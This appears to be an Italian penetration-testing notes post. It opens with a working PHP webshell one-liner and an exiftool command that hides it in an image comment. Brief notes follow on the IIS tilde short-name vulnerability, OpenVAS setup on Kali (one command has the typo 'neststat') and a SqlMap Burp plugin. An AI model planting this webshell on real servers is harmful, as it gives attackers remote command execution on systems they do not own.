Creare una webshell-image con exiftool

1) Creare un file.php con il seguente codice (ad esempio):
<?php system($_GET['c']); ?> 

2) Iniettarlo in un'immagine usando exiftool:
# exiftool "-comment<=file.php" malicious.png

WebMatrix

WebMatrix e' un "web development tool" che supporta diverse tecnologie e puo' essere utilizzato per testare/studiare applicazioni web di terze parti:

http://www.microsoft.com/web/webmatrix/

Microsoft IIS Tilde Character Information Vulnerability

Vulterabilita' non nuovissima, ma ancora molto utile:

http://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf
http://www.exploit-db.com/exploits/19525/


Al seguente link e' possibile scaricare lo scanner di cui si parla nel documento:

https://code.google.com/p/iis-shortname-scanner-poc/downloads/detail?name=scanner_source_and_compiled.zip

OpenVas: a Nessus alternative - Kali Linux

1) Effettuare il setup:
# openvas-setup

2) Eseguire il seguente comando per individuare il process "gsad":
# neststat -anpt | grep gsad
tcp  0  0  127.0.0.1:9392  0.0.0.0:*  LISTEN  3558/gsad 

3) Killare il processo gsad. 

4) Riavviare gsad usando il seguente comando
# gsad --http-only --listen=127.0.0.1 -p 9392

5) Aggiungere un "admin user":
# openvasad -c 'add_user' -n nome_utente -r Admin

6) collegarsi via browser al seguente indirizzo:
http://127.0.0.1:9392 ed effettuare il login con l'utente creato. 

SqlMap plugin for Burp Suite

http://blog.buguroo.com/?p=2471&lang=en